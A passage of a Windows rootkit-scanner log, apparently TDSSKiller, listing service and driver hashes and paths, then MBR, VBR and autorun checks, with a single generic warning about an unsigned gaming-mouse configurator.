21:27:12.0122 0x0ce4  vmgid - ok
21:27:12.0128 0x0ce4  [ A9C889CFDDE704A15CDC639C3D6662B6, 9EE41886D9E8DFDB512B821EAFE1857E83A3C3318EB852A2C110DB8184346AA9 ] vmicguestinterface C:\WINDOWS\System32\icsvc.dll
21:27:12.0141 0x0ce4  vmicguestinterface - ok
21:27:12.0146 0x0ce4  [ A9C889CFDDE704A15CDC639C3D6662B6, 9EE41886D9E8DFDB512B821EAFE1857E83A3C3318EB852A2C110DB8184346AA9 ] vmicheartbeat   C:\WINDOWS\System32\icsvc.dll
21:27:12.0159 0x0ce4  vmicheartbeat - ok
21:27:12.0164 0x0ce4  [ A9C889CFDDE704A15CDC639C3D6662B6, 9EE41886D9E8DFDB512B821EAFE1857E83A3C3318EB852A2C110DB8184346AA9 ] vmickvpexchange C:\WINDOWS\System32\icsvc.dll
21:27:12.0177 0x0ce4  vmickvpexchange - ok
21:27:12.0184 0x0ce4  [ F8F380ABEAFBC589FF6D2D96267C1210, 0CFA3D9E88D984BAFED8E08102BF4DC4077856C6C8C1EBD8D4C4D0D49B673F44 ] vmicrdv         C:\WINDOWS\System32\icsvcext.dll
21:27:12.0197 0x0ce4  vmicrdv - ok
21:27:12.0203 0x0ce4  [ A9C889CFDDE704A15CDC639C3D6662B6, 9EE41886D9E8DFDB512B821EAFE1857E83A3C3318EB852A2C110DB8184346AA9 ] vmicshutdown    C:\WINDOWS\System32\icsvc.dll
21:27:12.0215 0x0ce4  vmicshutdown - ok
21:27:12.0221 0x0ce4  [ A9C889CFDDE704A15CDC639C3D6662B6, 9EE41886D9E8DFDB512B821EAFE1857E83A3C3318EB852A2C110DB8184346AA9 ] vmictimesync    C:\WINDOWS\System32\icsvc.dll
21:27:12.0234 0x0ce4  vmictimesync - ok
21:27:12.0240 0x0ce4  [ A9C889CFDDE704A15CDC639C3D6662B6, 9EE41886D9E8DFDB512B821EAFE1857E83A3C3318EB852A2C110DB8184346AA9 ] vmicvmsession   C:\WINDOWS\System32\icsvc.dll
21:27:12.0253 0x0ce4  vmicvmsession - ok
21:27:12.0259 0x0ce4  [ F8F380ABEAFBC589FF6D2D96267C1210, 0CFA3D9E88D984BAFED8E08102BF4DC4077856C6C8C1EBD8D4C4D0D49B673F44 ] vmicvss         C:\WINDOWS\System32\icsvcext.dll
21:27:12.0272 0x0ce4  vmicvss - ok
21:27:12.0276 0x0ce4  [ 0AB9C264F13E2A070A8CF10EDD099ED2, 2E7EB4EE8DCBBCA497CC0E7F4BE057627E9702B6FAF56A7DBCA1325236C880EC ] volmgr          C:\WINDOWS\system32\drivers\volmgr.sys
21:27:12.0283 0x0ce4  volmgr - ok
21:27:12.0290 0x0ce4  [ 6EE608257C1137A25B402EF8FC77E83A, 3AE684EBA32563468AD917155C93220F938460A699FBFC3DB8436F83C0C54209 ] volmgrx         C:\WINDOWS\system32\drivers\volmgrx.sys
21:27:12.0301 0x0ce4  volmgrx - ok
21:27:12.0309 0x0ce4  [ E3429DBBEA3965BB96E24B16EF4A2551, 0CEE2DEF75C6761DA67AFD3BBF8DEEB1331796719EB84D658B3E517DEC824B49 ] volsnap         C:\WINDOWS\system32\drivers\volsnap.sys
21:27:12.0321 0x0ce4  volsnap - ok
21:27:12.0324 0x0ce4  [ 86E790B503C771E674C7DF8FFCBFEFDB, 634B27C4FA363A2165D3D6929D3B22F41EE06198C579A70D446A48830924467B ] volume          C:\WINDOWS\system32\drivers\volume.sys
21:27:12.0329 0x0ce4  volume - ok
21:27:12.0333 0x0ce4  [ B25589A0892E6DF8CC07E5CB48BFC954, DA29974426EFD4472A3828FA0EF31AD3860AA8068AB66B5F4BE6A412BC3E73E9 ] vpci            C:\WINDOWS\System32\drivers\vpci.sys
21:27:12.0339 0x0ce4  vpci - ok
21:27:12.0344 0x0ce4  [ AA4466A47D2CA7ECE3DCF5256017DCC3, 83414BFBD3DF1CB7417F0F55709E8180D97FA20A74581C34EAAFF667FBEBFD93 ] vsmraid         C:\WINDOWS\system32\drivers\vsmraid.sys
21:27:12.0352 0x0ce4  vsmraid - ok
21:27:12.0374 0x0ce4  [ 0BB73BF6FDDD19DE3DE9377EA95E4C64, 74B6E612F9E009A5E43B603BCAD854F3711F6C8A7ED0328B1E3A9B2D4C9EA342 ] VSS             C:\WINDOWS\system32\vssvc.exe
21:27:12.0415 0x0ce4  VSS - ok
21:27:12.0437 0x0ce4  [ 3B8D01B7C1A4F714D01FAA8DEA70A20A, 25944F4B10B42C5596539FCD42290D8A40869F4700C074BBF9CC3721B9AE5E02 ] VSSERV          C:\Program Files\Bitdefender\Bitdefender 2017\vsserv.exe
21:27:12.0462 0x0ce4  VSSERV - ok
21:27:12.0472 0x0ce4  [ 4889BF61752AD05C2AC73CF72A7C8F16, 9B2FF0CAF57855AA1F37933F2B9DC2B845D6BAD80C5DD400BD688DF343AFCDF5 ] vsservp         C:\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe
21:27:12.0484 0x0ce4  vsservp - ok
21:27:12.0492 0x0ce4  [ 98BB6C9AD39D8F2E883093F28282FAEC, 63F4036A1DB23C20AAEEC1CA8ABDE9B46FA09A55EA4E5DB0C0B5D6D58ABAD62F ] VSTXRAID        C:\WINDOWS\system32\drivers\vstxraid.sys
21:27:12.0502 0x0ce4  VSTXRAID - ok
21:27:12.0505 0x0ce4  [ B47026E109828102266CBE2F5F9AD113, 28C76B34C48BACEA267A208CC758BB55539323B16300E869AE71B6A99A849AB5 ] vwifibus        C:\WINDOWS\System32\drivers\vwifibus.sys
21:27:12.0519 0x0ce4  vwifibus - ok
21:27:12.0523 0x0ce4  [ 799ECD541A9B2764B36A22A095885365, E255E74682927D662294AA3F88FDA211EEE603466EB264E8941C3BACC6A0E530 ] vwififlt        C:\WINDOWS\system32\drivers\vwififlt.sys
21:27:12.0538 0x0ce4  vwififlt - ok
21:27:12.0541 0x0ce4  [ 82CA088A33517D1C8571D6850CC13D7E, 0401A08EAF36DB393B74FE8693C60F62EDE10BBC9300C76812C7D01B6AE9A051 ] vwifimp         C:\WINDOWS\System32\drivers\vwifimp.sys
21:27:12.0555 0x0ce4  vwifimp - ok
21:27:12.0564 0x0ce4  [ E75460AC4E936BFC0703021DB0BB17B8, D9985C3206B503659FD2F4EE7FD0B9AF8CB2DE821BFD68B13C9E3BD9CE5AEF6B ] W32Time         C:\WINDOWS\system32\w32time.dll
21:27:12.0588 0x0ce4  W32Time - ok
21:27:12.0592 0x0ce4  [ F0F477541F7AF67CC05DA1CF4921A500, F7DD2F49B61C484596DE3893683B1172A138386BD71F54BFCF37A31005C7368F ] WacomPen        C:\WINDOWS\System32\drivers\wacompen.sys
21:27:12.0599 0x0ce4  WacomPen - ok
21:27:12.0608 0x0ce4  [ A0957CBC1C054A87EE7A65A994102A96, CB6339F3F67D0E33C26E6756F88869574B84426B20C907E094F83B9DC5E36A3E ] WalletService   C:\WINDOWS\system32\WalletService.dll
21:27:12.0625 0x0ce4  WalletService - ok
21:27:12.0629 0x0ce4  [ FDD16EF9177A8A2EF08A7FA3D3EFAA13, 148F34CBEEF0CE87103C76294AE5BE318F990A5FE7A5EDE6F47D85361248582B ] wanarp          C:\WINDOWS\system32\DRIVERS\wanarp.sys
21:27:12.0644 0x0ce4  wanarp - ok
21:27:12.0647 0x0ce4  [ FDD16EF9177A8A2EF08A7FA3D3EFAA13, 148F34CBEEF0CE87103C76294AE5BE318F990A5FE7A5EDE6F47D85361248582B ] wanarpv6        C:\WINDOWS\system32\DRIVERS\wanarp.sys
21:27:12.0662 0x0ce4  wanarpv6 - ok
21:27:12.0684 0x0ce4  [ EA0524A2A01792796EC80AE2FE08307A, 68CC0F3451C6797222411C276376C7741C96C45E628DD77FB1FB17C10DC0EA8A ] wbengine        C:\WINDOWS\system32\wbengine.exe
21:27:12.0724 0x0ce4  wbengine - ok
21:27:12.0740 0x0ce4  [ 5E3E24AA72FA75D6322C7286917BEB4A, 97D0CF00873A5A70C1B4A73AD41F4053B22810DA37FF2E8528D510216311FEE1 ] WbioSrvc        C:\WINDOWS\System32\wbiosrvc.dll
21:27:12.0767 0x0ce4  WbioSrvc - ok
21:27:12.0772 0x0ce4  [ 2B7CCCFBB166100842D31440228588CF, FC0BE611C5497A0579E7D8F268BBE1BD520A8A764F112C7C5CC631767B683B79 ] wcifs           C:\WINDOWS\system32\drivers\wcifs.sys
21:27:12.0780 0x0ce4  wcifs - ok
21:27:12.0793 0x0ce4  [ E00FE13E415C97C60E5A418965372A74, E74EBE34D3056F52231C7B12E6294AED1C4F02219E853D5E70AA05D823C800D5 ] Wcmsvc          C:\WINDOWS\System32\wcmsvc.dll
21:27:12.0818 0x0ce4  Wcmsvc - ok
21:27:12.0827 0x0ce4  [ 2C396871F724DDF871A2EF4CADE5151D, 8CAD8A393F0CC447432E1BED21A691E25356F7DBC06E3887138A6F86CB1D656D ] wcncsvc         C:\WINDOWS\System32\wcncsvc.dll
21:27:12.0844 0x0ce4  wcncsvc - ok
21:27:12.0848 0x0ce4  [ 1737BEF60CA384423CE4B32AF1C2BFFC, D61353D3B2EAEDFDCBB5DB3AD27E76396CC7755AFF01233307EAA1967493DE63 ] wcnfs           C:\WINDOWS\system32\drivers\wcnfs.sys
21:27:12.0856 0x0ce4  wcnfs - ok
21:27:12.0859 0x0ce4  [ 38130C1C5FE0E08820EE57E1B087B659, 3705AA4699D4C402C0BBC5BC4E1EE67CB4A4B9C27702E88952A76891C3A3F496 ] WdBoot          C:\WINDOWS\system32\drivers\WdBoot.sys
21:27:12.0866 0x0ce4  WdBoot - ok
21:27:12.0881 0x0ce4  [ 0C6CBF3490EE5F0D62B5820568CA30B8, 97EDEC84DA72A900D7740B8763DDDAB600628F3F1E1DDE1212383C2E60FDC77C ] Wdf01000        C:\WINDOWS\system32\drivers\Wdf01000.sys
21:27:12.0899 0x0ce4  Wdf01000 - ok
21:27:12.0906 0x0ce4  [ F7B6CB0F9ECD28848E2BDACEAB0D9204, B64D91A36600AEBE656F0514AF8653C294DE88054FE6DBB7B1A6D0A23D2A5131 ] WdFilter        C:\WINDOWS\system32\drivers\WdFilter.sys
21:27:12.0916 0x0ce4  WdFilter - ok
21:27:12.0920 0x0ce4  [ 501CB5E6999B7336BE5D0D401013D251, D4581E4FD8BE65D611E763AE88D2982A785036B2A93F2A00D3A3A395AB2AD5B3 ] WdiServiceHost  C:\WINDOWS\system32\wdi.dll
21:27:12.0932 0x0ce4  WdiServiceHost - ok
21:27:12.0935 0x0ce4  [ 501CB5E6999B7336BE5D0D401013D251, D4581E4FD8BE65D611E763AE88D2982A785036B2A93F2A00D3A3A395AB2AD5B3 ] WdiSystemHost   C:\WINDOWS\system32\wdi.dll
21:27:12.0947 0x0ce4  WdiSystemHost - ok
21:27:12.0961 0x0ce4  [ 2974422E31DBC953A585A065EF736948, B2E689579C12B1A8B2CB4F04875157E894CE747DF56A9B7083E04A8C9B85EAC5 ] wdiwifi         C:\WINDOWS\system32\DRIVERS\wdiwifi.sys
21:27:12.0989 0x0ce4  wdiwifi - ok
21:27:12.0994 0x0ce4  [ 82A4F22C884B4BAE8B531640859F9871, 1C662557F671FA680E7CC2FC565B198470E421778BD03749CD05B2928568C430 ] WdNisDrv        C:\WINDOWS\system32\Drivers\WdNisDrv.sys
21:27:13.0001 0x0ce4  WdNisDrv - ok
21:27:13.0003 0x0ce4  WdNisSvc - ok
21:27:13.0009 0x0ce4  [ 9066FE8EAB91E15437CB3C43757F2A65, 1F8B3D8C90C7862CCAB91D170F49E7F1D58FABAFA1C8DDDE1796404D1DD98707 ] WebClient       C:\WINDOWS\System32\webclnt.dll
21:27:13.0023 0x0ce4  WebClient - ok
21:27:13.0029 0x0ce4  [ F322B8E6C5614E7975C8BF34B7A6710E, 299816001856E8C91BFBB9C48D87B7ACBD5A39F6A65147F5AE6EDB3065A893E9 ] Wecsvc          C:\WINDOWS\system32\wecsvc.dll
21:27:13.0041 0x0ce4  Wecsvc - ok
21:27:13.0044 0x0ce4  [ 04CA184EB5743DE5A2CCEEF2DB2DA8B3, E16921496F57B78A152A103F8D58601C9687360048A6CB51E76A96E3B64CC0FA ] WEPHOSTSVC      C:\WINDOWS\system32\wephostsvc.dll
21:27:13.0054 0x0ce4  WEPHOSTSVC - ok
21:27:13.0058 0x0ce4  [ BA78F20F7FD7709EA3AAAD91F8535EDA, D1DFBFCBBB8D4D992FBF3B340DB6A2F5DDC7E55F52E1100297EA2004FF752A2B ] wercplsupport   C:\WINDOWS\System32\wercplsupport.dll
21:27:13.0070 0x0ce4  wercplsupport - ok
21:27:13.0075 0x0ce4  [ E5AE3B23620126483B957BDFF38FE7B7, 306AAA0B37F3914FE590A5DBFBF640C79173150C006BC7A6CF1683D85C0AFC5F ] WerSvc          C:\WINDOWS\System32\WerSvc.dll
21:27:13.0086 0x0ce4  WerSvc - ok
21:27:13.0096 0x0ce4  [ 51D61CA3CED9A0C4E5501EEDBD48039F, 95F9CC67537DEABE501B59351624F02126BC9B9DBB72016423FF997090A2128B ] WFDSConMgrSvc   C:\WINDOWS\System32\wfdsconmgrsvc.dll
21:27:13.0123 0x0ce4  WFDSConMgrSvc - ok
21:27:13.0128 0x0ce4  [ 3C8F0ABD00E197101DCF43FEF8FB0D76, AF5C68B85EE1503ACD4AEA1D997F816C34293A77791D59A605DC18450B4906DE ] WFPLWFS         C:\WINDOWS\system32\drivers\wfplwfs.sys
21:27:13.0136 0x0ce4  WFPLWFS - ok
21:27:13.0140 0x0ce4  [ 2DEB40D6837956CE08A8F9EB3ECA5A01, B40D23E54CDF6BE05D6C5DA536BF6D998E79EDE9C391A42452F9F69EE206EA1E ] WiaRpc          C:\WINDOWS\System32\wiarpc.dll
21:27:13.0149 0x0ce4  WiaRpc - ok
21:27:13.0153 0x0ce4  [ 75014BF6510D4C6C69EEE5B7743A52AF, 11AEEF4D52C35E5A7006713836ECF1198A53CD02736E792B1C698144CA1363F0 ] WIMMount        C:\WINDOWS\system32\drivers\wimmount.sys
21:27:13.0158 0x0ce4  WIMMount - ok
21:27:13.0160 0x0ce4  WinDefend - ok
21:27:13.0166 0x0ce4  [ C8EBCFED8FD2CDF725E44AF93016621E, A0B76E55CC535A0F1D79C3C0EC59753086EAB669EC7ADA4F97656DCAD2A69448 ] WindowsTrustedRT C:\WINDOWS\system32\drivers\WindowsTrustedRT.sys
21:27:13.0173 0x0ce4  WindowsTrustedRT - ok
21:27:13.0176 0x0ce4  [ D318557F9D7CA3836104F0B8ECB1F32E, 6850BBFB4F65167B052F3CA22FD72E9188A14FD2A9CC085861B4BC40CBA34249 ] WindowsTrustedRTProxy C:\WINDOWS\system32\drivers\WindowsTrustedRTProxy.sys
21:27:13.0182 0x0ce4  WindowsTrustedRTProxy - ok
21:27:13.0196 0x0ce4  [ 61F0D6574577499FB43D9F4870B08A7F, 757ACD4F292C43B04B6428D84A7147DE8E565716D94B6B02F288F3B5E2D1C135 ] WinHttpAutoProxySvc C:\WINDOWS\system32\winhttp.dll
21:27:13.0217 0x0ce4  WinHttpAutoProxySvc - ok
21:27:13.0221 0x0ce4  [ 31DDF1D001336B2DCE7DF24E99EF1D04, A1FCABF4A263BFAE042FE7A9F6C15FD9B3D8E985278C32AE8975ECE79B341277 ] WinMad          C:\WINDOWS\System32\drivers\winmad.sys
21:27:13.0226 0x0ce4  WinMad - ok
21:27:13.0234 0x0ce4  [ 9A26F7834706A6D8C8824EB08FD7C362, 750F6A0759D70BE481C70FE4BB21D18E756A8F0C23A014C2CE1E7729A1E625FE ] Winmgmt         C:\WINDOWS\system32\wbem\WMIsvc.dll
21:27:13.0250 0x0ce4  Winmgmt - ok
21:27:13.0256 0x0ce4  [ 2E1A614EFB0523E20860AE7978DDA0A4, E13564690F9977747CA676D3843B467506447F060A5FF6676835A9C7A30BA409 ] WinNat          C:\WINDOWS\system32\drivers\winnat.sys
21:27:13.0266 0x0ce4  WinNat - ok
21:27:13.0305 0x0ce4  [ 27DAA9AA3E03C1068678D5659461BB32, AFDED6D671C430F296C9EAA73590111D6A8A9FA93DFE0595B90467FFE28EFB35 ] WinRM           C:\WINDOWS\system32\WsmSvc.dll
21:27:13.0376 0x0ce4  WinRM - ok
21:27:13.0384 0x0ce4  [ 03858B18BB6DF6A400D9FC5153FD28A8, C7AD69B022AEFDDDAFB74CCCDF20AF9CCDBA0097634BBBD07A2EFBA5922560C1 ] WINUSB          C:\WINDOWS\System32\drivers\WinUSB.SYS
21:27:13.0392 0x0ce4  WINUSB - ok
21:27:13.0396 0x0ce4  [ 0BF4A43CF1F3A4D50AFA4561C3B4628D, 2D0B4E7004C8AC8A9EE07E6D5241BF32395CA142BF3B03FA9CF00BC6720A6AC7 ] WinVerbs        C:\WINDOWS\System32\drivers\winverbs.sys
21:27:13.0402 0x0ce4  WinVerbs - ok
21:27:13.0414 0x0ce4  [ 11DDD4C9BDF095A5F5B5ACA98FBBF7A2, CFA76C197987CC9EBFE4AC2AD6FE9A9620819B50E9DD423BCE13F7DB5DA641D8 ] wisvc           C:\WINDOWS\system32\flightsettings.dll
21:27:13.0436 0x0ce4  wisvc - ok
21:27:13.0470 0x0ce4  [ E624376E7E7D9AC203113140D9E618A2, 3553D343665194492E38B8C437DE429CEAC135D69EC0CB951BA3E3A7549F673E ] WlanSvc         C:\WINDOWS\System32\wlansvc.dll
21:27:13.0534 0x0ce4  WlanSvc - ok
21:27:13.0566 0x0ce4  [ 2393C4DB3DF3D19B0B920AD607098E79, D632671247DE3808D9C5B36A3FF173C86BB3AD274D03C851BCD417CE62B3820D ] wlidsvc         C:\WINDOWS\system32\wlidsvc.dll
21:27:13.0619 0x0ce4  wlidsvc - ok
21:27:13.0640 0x0ce4  [ E5AB2E0B4F766E34AFC768D9769A24D7, 0DE04B2F43B9DCC92F9215B1058EE4ABA228B9986051CF39959555C12DF017B3 ] wlpasvc         C:\WINDOWS\System32\lpasvc.dll
21:27:13.0680 0x0ce4  wlpasvc - ok
21:27:13.0684 0x0ce4  [ 0D6E1347A891607759340B1E55BA2A77, 033DF14920A581FE7E21C6930280AE159B5634F2FEAF79423E8D0B7D46500048 ] WmiAcpi         C:\WINDOWS\System32\drivers\wmiacpi.sys
21:27:13.0691 0x0ce4  WmiAcpi - ok
21:27:13.0697 0x0ce4  [ F7B122E8A238354DE344B77216E8D9AC, 3C4F864655CFF786B33333E643AA929B2D2B01ECD56EEEEADE7CEAB38249DA3B ] wmiApSrv        C:\WINDOWS\system32\wbem\WmiApSrv.exe
21:27:13.0713 0x0ce4  wmiApSrv - ok
21:27:13.0715 0x0ce4  WMPNetworkSvc - ok
21:27:13.0720 0x0ce4  [ 1AE1076034392218EE89D2744EC2A071, 695C28E2697B12BBD919687176CE082E94887A5D8B6229F163A26F6EDF401C4C ] Wof             C:\WINDOWS\system32\drivers\Wof.sys
21:27:13.0729 0x0ce4  Wof - ok
21:27:13.0756 0x0ce4  [ D571821EDAA1F23EB521314FB9AA1C88, 7F16E6915060BD5FABE0805284631F92EEC11234579D09C3CEDDBF73D312E7F5 ] workfolderssvc  C:\WINDOWS\system32\workfolderssvc.dll
21:27:13.0800 0x0ce4  workfolderssvc - ok
21:27:13.0805 0x0ce4  [ 2AD9CC8445F0E1A8900A9DE123643CD2, A5928B26722DFBB201A32DEF48B25D4BF291815EA68CF50CBE79EEA9260A71E3 ] WPDBusEnum      C:\WINDOWS\system32\wpdbusenum.dll
21:27:13.0815 0x0ce4  WPDBusEnum - ok
21:27:13.0819 0x0ce4  [ 1FD80CBB192A20375F3664639DEB57B5, 7A4789D4B2F8E289726E1C723DC00D5AC1F8C5E00FB2879C9D0E6DDC97D2B1A6 ] WpdUpFltr       C:\WINDOWS\system32\drivers\WpdUpFltr.sys
21:27:13.0824 0x0ce4  WpdUpFltr - ok
21:27:13.0831 0x0ce4  [ 3369EF007E43B88EAC8F1789B43D4393, 347F9F7DF980BB739895EDFE72E2E595EF56634330DC63DAA36403AB232B5B5A ] WpnService      C:\WINDOWS\system32\WpnService.dll
21:27:13.0844 0x0ce4  WpnService - ok
21:27:13.0848 0x0ce4  [ 41403B9466EDA80FACD7713478A56DF8, A71BF9C7A2483FE1F660AC9688FCB38BA2310F16A69EB117C948458364953F34 ] WpnUserService  C:\WINDOWS\System32\WpnUserService.dll
21:27:13.0858 0x0ce4  WpnUserService - ok
21:27:13.0862 0x0ce4  [ DAF4451760B46CB383D287C4FAFFE97D, 658AFE31EF50E934FEDD2E7048257DBFE9E6DE5F1ACDC658B21737391CF1CC5A ] ws2ifsl         C:\WINDOWS\system32\drivers\ws2ifsl.sys
21:27:13.0874 0x0ce4  ws2ifsl - ok
21:27:13.0880 0x0ce4  [ D4A0661AB0FE542460CA76BFB4FAA2D6, 149F0A0720C47BFFCA68165A46382E5CBB273F48483DBB598CEA320801664718 ] wscsvc          C:\WINDOWS\System32\wscsvc.dll
21:27:13.0893 0x0ce4  wscsvc - ok
21:27:13.0896 0x0ce4  [ F6E37A2C168A58F0172DA50018959228, C97305641F63BC84F5207A739F442ACB0A5FD9262331BB61C4B00CF2C6D94121 ] WSDPrintDevice  C:\WINDOWS\System32\drivers\WSDPrint.sys
21:27:13.0903 0x0ce4  WSDPrintDevice - ok
21:27:13.0907 0x0ce4  [ F454BF3F0D3F19057B8612CA523D22D5, 869EC91E7D709C15ADF9D53C82A87F2D5220ED3CA44CEBF34F4D601E78DA0481 ] WSDScan         C:\WINDOWS\system32\DRIVERS\WSDScan.sys
21:27:13.0915 0x0ce4  WSDScan - ok
21:27:13.0918 0x0ce4  WSearch - ok
21:27:13.0954 0x0ce4  [ 05BEDBBEEAAC22F98FCA529FAC659582, E4D2FFF98034E2E7FE0478AB9C8D677CA932349A976DFC0C2B65DB15C71354B4 ] wuauserv        C:\WINDOWS\system32\wuaueng.dll
21:27:14.0011 0x0ce4  wuauserv - ok
21:27:14.0017 0x0ce4  [ 455609BF60DA3B57EEAB863DEFCCF14D, F55271C42B7AFD17D01275703719C1F52C21996DB82AC78A70A8A8B62370623B ] WudfPf          C:\WINDOWS\system32\drivers\WudfPf.sys
21:27:14.0026 0x0ce4  WudfPf - ok
21:27:14.0032 0x0ce4  [ 5068DAA8F67A62E964C9C9F88B159EA9, 09FCB7A817280957D1AD365EF8B46F666C70957238BF9FBC87D51115E1B0FCB0 ] WUDFRd          C:\WINDOWS\System32\drivers\WUDFRd.sys
21:27:14.0044 0x0ce4  WUDFRd - ok
21:27:14.0049 0x0ce4  [ 9EFE23CA208BF4B613FF4A6028DFAB10, 483D8D8DA578BF3EA5617EAB42457543EC6F97C1977BDD8ABFDF854AE3AAFD35 ] wudfsvc         C:\WINDOWS\System32\WUDFSvc.dll
21:27:14.0060 0x0ce4  wudfsvc - ok
21:27:14.0066 0x0ce4  [ 5068DAA8F67A62E964C9C9F88B159EA9, 09FCB7A817280957D1AD365EF8B46F666C70957238BF9FBC87D51115E1B0FCB0 ] WUDFWpdFs       C:\WINDOWS\system32\DRIVERS\WUDFRd.sys
21:27:14.0078 0x0ce4  WUDFWpdFs - ok
21:27:14.0100 0x0ce4  [ 3EEF7185E0974D9AB2D65CA3214132CF, 44DB1D11B6B1D180F59AB3FE4D7235F7F2FD709A853F6A64E8E379FFFD16CD3C ] WwanSvc         C:\WINDOWS\System32\wwansvc.dll
21:27:14.0146 0x0ce4  WwanSvc - ok
21:27:14.0154 0x0ce4  [ FC0147AB34C7CDB2D8A1B29C207F2CD1, 737D40A4BE35AD13C091D8E320FAD3FD7C0C7E41C8B50E48D3C2151712A55718 ] xbgm            C:\WINDOWS\System32\xbgmsvc.dll
21:27:14.0166 0x0ce4  xbgm - ok
21:27:14.0182 0x0ce4  [ 8C7C5945C3545CA767BE111D78C15314, 5A938679DA3EDA2D9CA7034908DFEFCC7DAADB10DFD0CF4ECE882FF536D1BFA2 ] XblAuthManager  C:\WINDOWS\System32\XblAuthManager.dll
21:27:14.0214 0x0ce4  XblAuthManager - ok
21:27:14.0233 0x0ce4  [ A8BD191F46CC58E45637CB3E262CF0F2, CA65524427ECDB5E1138A5F8E885566064E507BA60FC31E0D9D17B9556CC9ADC ] XblGameSave     C:\WINDOWS\System32\XblGameSave.dll
21:27:14.0265 0x0ce4  XblGameSave - ok
21:27:14.0272 0x0ce4  [ 3AC720A97FE4B6325F3012B21AF74390, 41AC655BD5CE5016BAA482534D1CEA6E11EAECE121344B45A5C8DF84A83807F4 ] xboxgip         C:\WINDOWS\System32\drivers\xboxgip.sys
21:27:14.0284 0x0ce4  xboxgip - ok
21:27:14.0287 0x0ce4  [ E099DED5C602AE4A7ECCF7CD4B1D2E33, 7FDAFFE13B87A8E6AA8721F8905FFF6EF04CAB93009F68EDA862B57EBB04514F ] XboxGipSvc      C:\WINDOWS\System32\XboxGipSvc.dll
21:27:14.0296 0x0ce4  XboxGipSvc - ok
21:27:14.0312 0x0ce4  [ 8489AA1A36074B3487BFDA8A9FDBAB3D, 59337C1F65AF42820260FCE271D18C2221B64A5E53005A11ECF397F651031C6A ] XboxNetApiSvc   C:\WINDOWS\system32\XboxNetApiSvc.dll
21:27:14.0348 0x0ce4  XboxNetApiSvc - ok
21:27:14.0352 0x0ce4  [ 2E50A379A8E4F6C5D85E87C26C08D329, ADA0C344FE58A3772FFF7417268160E488741C5B2F08CA12ED587AB7F75756F6 ] xinputhid       C:\WINDOWS\System32\drivers\xinputhid.sys
21:27:14.0360 0x0ce4  xinputhid - ok
21:27:14.0361 0x0ce4  ================ Scan global ===============================
21:27:14.0365 0x0ce4  [ EEA8447A2E39A39F66C74BA66C421F92, 7FFC5294E0D0438E7450ED36947AB04D0C84DF4E1C9F2D49340D3BA586FFFAB2 ] C:\WINDOWS\system32\basesrv.dll
21:27:14.0368 0x0ce4  [ A42970F5DAA633B35322F200C39DF4CF, 91EEA2A5BA8FF0CBCB058218B01E747D29ADE4544AFC5474C71DB380866B4F2E ] C:\WINDOWS\system32\winsrv.dll
21:27:14.0373 0x0ce4  [ 7DD72CBE412C9567661F4B1CE9631FC1, 8D914805CBDAF448C8C132C4C3FEB1D90804F4F485180F7364A75EC5655A4DDB ] C:\WINDOWS\system32\sxssrv.dll
21:27:14.0385 0x0ce4  [ 800D00D1A7ADA9E341CACDF287347584, 70AD5A458203B35F227F3F6B4783D00424C96AA9E29DB3090CEC8C00E62CD8E5 ] C:\WINDOWS\system32\services.exe
21:27:14.0392 0x0ce4  [ Global ] - ok
21:27:14.0393 0x0ce4  ================ Scan MBR ==================================
21:27:14.0394 0x0ce4  [ A36C5E4F47E84449FF07ED3517B43A31 ] \Device\Harddisk0\DR0
21:27:14.0442 0x0ce4  \Device\Harddisk0\DR0 - ok
21:27:14.0444 0x0ce4  [ A36C5E4F47E84449FF07ED3517B43A31 ] \Device\Harddisk1\DR1
21:27:14.0537 0x0ce4  \Device\Harddisk1\DR1 - ok
21:27:14.0537 0x0ce4  ================ Scan VBR ==================================
21:27:14.0540 0x0ce4  [ 351CECEC6A59AE7E66C90571BB64BDAD ] \Device\Harddisk0\DR0\Partition1
21:27:14.0541 0x0ce4  \Device\Harddisk0\DR0\Partition1 - ok
21:27:14.0542 0x0ce4  [ B8EFACFC8DDDACD5C7BB953E94688084 ] \Device\Harddisk0\DR0\Partition2
21:27:14.0543 0x0ce4  \Device\Harddisk0\DR0\Partition2 - ok
21:27:14.0544 0x0ce4  [ 7CDAA8D0E7BFAF4494CB22AEA4D87AD1 ] \Device\Harddisk1\DR1\Partition1
21:27:14.0545 0x0ce4  \Device\Harddisk1\DR1\Partition1 - ok
21:27:14.0546 0x0ce4  ================ Scan generic autorun ======================
21:27:14.0546 0x0ce4  SecurityHealth - ok
21:27:14.0658 0x0ce4  [ 912858EE253CA62AC0DC326BB556273B, 6E2BBDA20BB439AE8215FAE7FEDA3DE72F74A336435CE2567E36741D0682B9E5 ] C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
21:27:14.0775 0x0ce4  RTHDVCPL - ok
21:27:14.0793 0x0ce4  [ ED43758BF94B8A5221D69F1B7F63F13D, F6E7418823E45085F4D4F50DD25A55ED517C0A335C6C2F69A1139B30677D3DA9 ] C:\Program Files\Microsoft Xbox 360 Accessories\XboxStat.exe
21:27:14.0809 0x0ce4  XboxStat - ok
21:27:14.0818 0x0ce4  [ F8A8125BF28F03D79CDEA5B0B69FF60B, 13E5DE36EB61384B0726447442F0CE4838C20E4F3F730B9B9BB84A2020A68A82 ] C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe
21:27:14.0827 0x0ce4  IJNetworkScannerSelectorEX - ok
21:27:14.0832 0x0ce4  [ CD0362AEE36CFE1EF5DF973230742E67, 9F1D8AD4E09D16C39CD6A35CB298456468C1808226FFA8AD65BF9562A6ECC07D ] C:\Program Files (x86)\PDF24\pdf24.exe
21:27:14.0841 0x0ce4  PDFPrint - ok
21:27:14.0846 0x0ce4  [ ED13374E76D833772A687EA3594C1120, 3A2A0C41DED8555ACEB9CAAE7F9C0053B11CEE1877B06D993BDCA0E491DB6CE6 ] C:\Program Files (x86)\Drakonia Configurator\hid.exe
21:27:14.0854 0x0ce4  GamingMouse - detected UnsignedFile.Multi.Generic ( 1 )
21:27:15.0210 0x0ce4  GamingMouse ( UnsignedFile.Multi.Generic ) - warning
21:27:15.0737 0x0ce4  [ 450FDD861FD582026BDCE55FCB2162C4, 91166DBAEE6A0D97ABA5EED352D06078870A265E736ED491C666CB6A8559BEB2 ] C:\Windows\SysWOW64\OneDriveSetup.exe
21:27:16.0017 0x0ce4  OneDriveSetup - ok
21:27:16.0290 0x0ce4  [ 450FDD861FD582026BDCE55FCB2162C4, 91166DBAEE6A0D97ABA5EED352D06078870A265E736ED491C666CB6A8559BEB2 ] C:\Windows\SysWOW64\OneDriveSetup.exe
